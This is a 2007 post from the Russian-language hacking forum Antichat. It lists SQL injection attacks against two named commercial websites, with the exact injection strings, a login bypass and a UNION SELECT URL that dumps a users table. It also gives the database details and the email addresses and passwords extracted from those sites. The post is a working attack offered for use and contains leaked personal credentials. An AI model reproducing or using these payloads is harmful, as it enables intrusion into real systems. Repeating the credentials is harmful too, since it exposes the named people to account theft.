10.11.2007, 21:20
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
quickgifts.com
version: Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright (c) 1988-2002 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
db_name: dbLogins
user: qglogin
В поле email:
Код:
1' or 1=(SELECT TOP 1 password FROM tblusers)--
email: dshifley@quickgifts.com
password: ZHNoaWZsZXk=
Или так:
email: ' or 1=1--
password: любой
whalesdirect.com
Код:
http://www.whalesdirect.com/product.html?t_q=FT305'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58),email,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+users+--+
4.1.20:crt@localhost:whalesdirect_com
email:steve@tshirtriot.com
password:h0bbes
Куда вводить не нашел
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|